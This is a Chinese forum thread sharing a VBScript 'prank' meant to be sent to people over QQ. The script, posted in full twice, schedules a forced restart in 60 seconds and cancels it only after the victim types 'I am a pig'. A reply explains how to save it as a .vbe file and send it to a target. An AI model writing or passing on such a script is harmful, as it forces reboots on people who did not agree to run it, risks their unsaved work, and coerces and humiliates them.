晗羽吧 关注:33贴子:1,385
  • 7回复贴,共1

QQ 整人使人关机的文件

只看楼主收藏回复

on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true 
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true 
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"



IP属地:河南1楼2008-08-14 12:48回复
    什么意思啊```


    2楼2008-08-15 16:14
    回复
      把一楼的另存为.vbe发给对方


      IP属地:河南3楼2008-08-16 17:00
      回复
        • 60.180.150.*
        很好玩


        4楼2009-06-19 14:49
        回复
          • 111.166.189.*
          on error resume next
          dim WSHshellA
          set WSHshellA = wscript.createobject("wscript.shell")
          WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true  
          dim a
          do while(a <> "我是猪")
          a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪""   ","说不说","不说",8000,7000)
          msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
          loop
          msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
          dim WSHshell
          set WSHshell = wscript.createobject("wscript.shell")
          WSHshell.run "cmd.exe /c shutdown -a",0 ,true  
          msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
          


          5楼2010-04-03 09:10
          回复
            ................


            6楼2010-04-05 20:16
            回复
              • 60.168.178.*
              好像不行啊


              7楼2010-05-02 20:31
              回复
                路过的


                IP属地:天津8楼2012-01-08 15:44
                回复